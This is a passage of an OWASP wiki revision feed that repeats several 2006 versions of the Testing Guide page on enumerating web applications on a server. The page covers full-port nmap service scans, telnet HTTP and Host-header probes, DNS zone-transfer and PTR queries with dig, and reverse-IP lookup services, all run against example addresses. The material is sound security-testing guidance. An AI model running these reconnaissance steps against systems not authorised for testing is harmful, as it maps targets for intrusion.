(The 65527 ports scanned but not shown below are in state: closed)&lt;br /&gt;
PORT      STATE SERVICE     VERSION&lt;br /&gt;
22/tcp    open  ssh         OpenSSH 3.5p1 (protocol 1.99)&lt;br /&gt;
80/tcp    open  http        Apache httpd 2.0.40 ((Red Hat Linux))&lt;br /&gt;
443/tcp   open  ssl         OpenSSL&lt;br /&gt;
901/tcp   open  http        Samba SWAT administration server&lt;br /&gt;
1241/tcp  open  ssl         Nessus security scanner&lt;br /&gt;
3690/tcp  open  unknown&lt;br /&gt;
8000/tcp  open  http-alt?&lt;br /&gt;
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
From this example, we see that&lt;br /&gt;
* There is an Apache http server running on port 80&lt;br /&gt;
* It looks like there is an https server on port 443 (but this needs to be confirmed; for example, by visiting https://192.168.1.100 with a browser)&lt;br /&gt;
* On port 901 there is a Samba SWAT web interface&lt;br /&gt;
* The service on port 1241 is not https, but is the SSL-wrapped Nessus daemon&lt;br /&gt;
* Port 3690 features an unspecified service (nmap gives back its ''fingerprint'' - here omitted for clarity - together with instructions to submit it for incorporation in the nmap fingerprint database, provided you know which service it represents)&lt;br /&gt;
* Another unspecified service on port 8000; this might be http, since it is not uncommon to find http servers on this port. Let's give it a look:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ telnet 192.168.1.100 8000&lt;br /&gt;
Trying 192.168.1.100...&lt;br /&gt;
Connected to 192.168.1.100.&lt;br /&gt;
Escape character is '^]'.&lt;br /&gt;
GET / HTTP/1.0&lt;br /&gt;
&lt;br /&gt;
HTTP/1.0 200 OK&lt;br /&gt;
pragma: no-cache&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
Server: MX4J-HTTPD/1.0&lt;br /&gt;
expires: now&lt;br /&gt;
Cache-Control: no-cache&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This confirms that it is in fact an HTTP server. Alternatively, we could have visited the URL with a web browser, or used the GET or HEAD Perl commands, which mimic HTTP interactions such as the one given above (note, however, that HEAD requests may not be honored by all servers).&lt;br /&gt;
* Apache Tomcat running on port 8080&lt;br /&gt;
&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – in addition to what nmap offers – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed (for example, a Tomcat administrative interface).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There are a number of techniques which may be used to identify the DNS names associated with a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is of limited use nowadays, since zone transfers are largely not honored by DNS servers, but it is worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, we must determine the name servers serving ''x.y.z.t''. If a symbolic name is known for ''x.y.z.t'' (let it be ''www.example.com''), its name servers can be determined by means of tools such as ''nslookup'' or ''dig'' by requesting DNS NS records.&amp;lt;br&amp;gt;&lt;br /&gt;
If no symbolic names are known for ''x.y.z.t'', but your target definition contains at least a symbolic name, you may try to apply the same process and query the name server of that name (hoping that ''x.y.z.t'' will be served as well by that name server). For example, if your target consists of the IP address ''x.y.z.t'' and of ''mail.example.com'', determine the name servers for domain ''example.com''.&amp;lt;br&amp;gt;&lt;br /&gt;
Then a zone transfer may be requested from the name servers for domain ''example.com''; if you are lucky, you will get back a list of the DNS entries for this domain. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated. &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous one, but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic-name maps, which is not guaranteed.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to a DNS zone transfer, but relies on web-based services that allow name-based searches on DNS. One such service is the ''Netcraft Search DNS'' service, available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com'', then check whether the names you obtained pertain to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There are a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered as much information as you can with the previous techniques, you can rely on search engines to possibly refine and extend your analysis. This may yield evidence of additional symbolic names belonging to your target, or applications accessible via non-obvious URLs.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
Not applicable. The methodology remains the same as listed in Black Box testing, no matter how much information you start with.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &amp;lt;br&amp;gt;&lt;br /&gt;
[2] nmap, http://www.insecure.org &amp;lt;br&amp;gt;&lt;br /&gt;
[3] Nessus Vulnerability Scanner, http://www.nessus.org &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
DNS lookup tools such as ''nslookup'', ''dig'' or similar. &amp;lt;br&amp;gt;&lt;br /&gt;
Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &amp;lt;br&amp;gt;&lt;br /&gt;
Search engines (Google, and other major engines). &amp;lt;br&amp;gt;&lt;br /&gt;
Specialized DNS-related web-based search service: see text.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=12236</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=12236"/>
				<updated>2006-11-10T15:18:14Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Gray Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step in testing a web presence for vulnerabilities is to find out which particular applications are hosted on a web server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many applications have known vulnerabilities and known attack strategies that can be exploited in order to gain remote control or to compromise data.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition, many applications are hosted on a given web server without being referenced from the main website: this is often true for internal and/or extranet websites, which may be misconfigured or left unpatched due to the perception that they are used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Furthermore, many applications use well-known paths for their administrative interfaces, which can be used to guess or brute-force administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1 relationship between an IP address and a web server is losing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes you, as a security professional, are given a set of IP addresses (or possibly just one) as a target to test, and nothing else. It is arguable that this scenario is more akin to a pentest-type engagement, but in any case such an assignment is expected to test all web applications accessible through this target (and possibly other things). The problem is that the given IP address may host an http service on port 80 which, when accessed by specifying the IP address (which is all you know), reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. Yet that system could &amp;quot;hide&amp;quot; a number of web applications, associated with unrelated symbolic (DNS) names. Obviously, the extent of your analysis is deeply affected by whether you test all of these applications or miss some of them because you fail to notice them.&lt;br /&gt;
Sometimes the target specification is richer: maybe you are handed a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey only partial information, i.e. it could omit some symbolic names – and the client might not even be aware of that! (This is more likely to happen in large organizations.)&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on a given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may also consist of a set of DNS symbolic names, or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should be as comprehensive in scope as possible, i.e. it should, first of all, identify all the applications accessible through the given target. In the following we will examine a few techniques that can be employed to achieve this goal. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Notes&amp;lt;/u&amp;gt; Some of the following techniques apply to Internet-facing web servers, namely DNS and reverse-IP web-based search services and the use of search engines. Examples make use of private IP addresses (such as ''192.168.1.100'') which, unless indicated otherwise, represent ''generic'' IP addresses and are used only for anonymity purposes.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated to three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case the URL http://www.example.com/ would not be associated with a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. There is usually no reason to publish web applications in this way, unless you don’t want them to be accessible in a standard way and are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, just that their existence and location are not explicitly advertised.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows a single IP address to be associated with one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated with the DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (it is not even necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be used to serve different content through so-called virtual hosts. The information specifying the virtual host being referred to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
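&amp;lt;br&amp;gt;&lt;br /&gt;
Once a candidate name is known, the corresponding virtual host can be probed directly by supplying that name in the ''Host:'' header (''helpdesk.example.com'' is used here purely as an example): &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ telnet 192.168.1.100 80&lt;br /&gt;
GET / HTTP/1.1&lt;br /&gt;
Host: helpdesk.example.com&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
If the server is configured with that virtual host, the response will differ from the one obtained for ''www.example.com''.&lt;br /&gt;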
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no foolproof way to ascertain the existence of non-standard-named web applications. Being non-standard, there is no fixed recipe for discovering them. However, a few criteria may aid the search.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
First, if the web server is misconfigured and allows directory browsing, it may be possible to spot these applications. Vulnerability scanners may help in this respect. &amp;lt;br&amp;gt;&lt;br /&gt;
Second, these applications might be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'' we could, for example, search using the ''site'' operator and examine the results of the query “site:www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which are likely candidates for non-published applications. For example, a web mail front end might be accessible from https://www.example.com/webmail even though this URL is not referenced anywhere (after all, employees know where the webmail application is located, and there is no reason to advertise it to outsiders by publishing it on the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example, a Tomcat administrative interface) and yet not be referenced anywhere. So a bit of dictionary-style searching (or “intelligent guessing”) could yield some results. Vulnerability scanners may help in this respect.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
The existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] can perform service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nmap -P0 -sT -sV -p1-65535 192.168.1.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
It is sufficient to examine the output, looking for http or for indications of SSL-wrapped services (which should be probed to confirm they are https). For example, the output of the previous command could look like:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Interesting ports on 192.168.1.100:&lt;br /&gt;
(The 65527 ports scanned but not shown below are in state: closed)&lt;br /&gt;
PORT      STATE SERVICE     VERSION&lt;br /&gt;
22/tcp    open  ssh         OpenSSH 3.5p1 (protocol 1.99)&lt;br /&gt;
80/tcp    open  http        Apache httpd 2.0.40 ((Red Hat Linux))&lt;br /&gt;
443/tcp   open  ssl         OpenSSL&lt;br /&gt;
901/tcp   open  http        Samba SWAT administration server&lt;br /&gt;
1241/tcp  open  ssl         Nessus security scanner&lt;br /&gt;
3690/tcp  open  unknown&lt;br /&gt;
8000/tcp  open  http-alt?&lt;br /&gt;
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
From this example, we see that&lt;br /&gt;
* There is an Apache http server running on port 80&lt;br /&gt;
* It looks like there is an https server on port 443 (but this needs to be confirmed; for example, by visiting https://192.168.1.100 with a browser)&lt;br /&gt;
* On port 901 there is a Samba SWAT web interface&lt;br /&gt;
* The service on port 1241 is not https, but is the SSL-wrapped Nessus daemon&lt;br /&gt;
* Port 3690 features an unspecified service (nmap gives back its ''fingerprint'' - here omitted for clarity - together with instructions to submit it for incorporation in the nmap fingerprint database, provided you know which service it represents)&lt;br /&gt;
* Another unspecified service on port 8000; this might possibly be http, since it is not uncommon to find http servers on this port. Let's give it a look&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ telnet 192.168.1.100 8000&lt;br /&gt;
Trying 192.168.1.100...&lt;br /&gt;
Connected to 192.168.1.100.&lt;br /&gt;
Escape character is '^]'.&lt;br /&gt;
GET / HTTP/1.0&lt;br /&gt;
&lt;br /&gt;
HTTP/1.0 200 OK&lt;br /&gt;
pragma: no-cache&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
Server: MX4J-HTTPD/1.0&lt;br /&gt;
expires: now&lt;br /&gt;
Cache-Control: no-cache&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This confirms that it is indeed an HTTP server. Alternatively, we could have visited the URL with a web browser, or used the GET or HEAD Perl commands, which mimic HTTP interactions such as the one given above (note, however, that HEAD requests may not be honored by all servers).&lt;br /&gt;
* Apache Tomcat running on port 8080&lt;br /&gt;
&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – with respect to nmap – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed (for example, a Tomcat administrative interface).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There are a number of techniques which may be used to identify the DNS names associated with a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is nowadays of limited use, given that zone transfers are largely not honored by DNS servers, but it is worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, we must determine the name servers serving ''x.y.z.t''. If a symbolic name is known for ''x.y.z.t'' (let it be ''www.example.com''), its name servers can be determined by means of tools such as ''nslookup'' or ''dig'' by requesting DNS NS records.&amp;lt;br&amp;gt;&lt;br /&gt;
If no symbolic names are known for ''x.y.z.t'', but your target definition contains at least a symbolic name, you may try to apply the same process and query the name server of that name (hoping that ''x.y.z.t'' will be served as well by that name server). For example, if your target consists of the IP address ''x.y.z.t'' and of ''mail.example.com'', determine the name servers for domain ''example.com''.&amp;lt;br&amp;gt;&lt;br /&gt;
Then a zone transfer may be requested from the name servers for domain ''example.com''; if you are lucky, you will get back a list of the DNS entries for this domain. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated.&lt;br /&gt;
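&amp;lt;br&amp;gt;&lt;br /&gt;
For example, with ''dig'' the whole process may look as follows (''ns1.example.com'' is a hypothetical name server; in practice, most servers will refuse the AXFR request): &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ dig example.com NS +short&lt;br /&gt;
ns1.example.com.&lt;br /&gt;
$ dig @ns1.example.com example.com AXFR&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;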
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous one, but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic-name maps, which is not guaranteed.&lt;br /&gt;
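For example, with ''dig'' an inverse query is performed by means of the -x option (the address shown is, as noted above, a generic one): &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ dig -x 192.168.1.100 +short&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;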
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to a DNS zone transfer, but relies on web-based services which allow name-based searches on DNS. One such service is the ''Netcraft Search DNS'' service, available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com'', and then check whether the names you obtain pertain to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There are a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered as much information as you can with the previous techniques, you can rely on search engines to refine and possibly extend your analysis. This may yield evidence of additional symbolic names belonging to your target, or of applications accessible via non-obvious URLs.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
Not applicable. The methodology remains the same as listed in Black Box testing, regardless of how much information you start with.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &amp;lt;br&amp;gt;&lt;br /&gt;
[2] nmap, http://www.insecure.org &amp;lt;br&amp;gt;&lt;br /&gt;
[3] Nessus Vulnerability Scanner, http://www.nessus.org &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
DNS lookup tools such as ''nslookup'', ''dig'' or similar. &amp;lt;br&amp;gt;&lt;br /&gt;
Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &amp;lt;br&amp;gt;&lt;br /&gt;
Search engines (Google, and other major engines). &amp;lt;br&amp;gt;&lt;br /&gt;
Specialized DNS-related web-based search service: see text.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=12234</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=12234"/>
				<updated>2006-11-10T15:16:29Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Gray Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step in testing a web presence for vulnerabilities is to find out which particular applications are hosted on a web server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many applications have known vulnerabilities and known attack strategies that can be exploited in order to gain remote control or to compromise data.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition, many applications are hosted on a given web server without being referenced from the main website: this is often true for internal and/or extranet websites, which may be misconfigured or left unpatched due to the perception that they are used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Furthermore, many applications use well-known paths for their administrative interfaces, which can be used to guess or brute-force administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1 relationship between an IP address and a web server is losing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
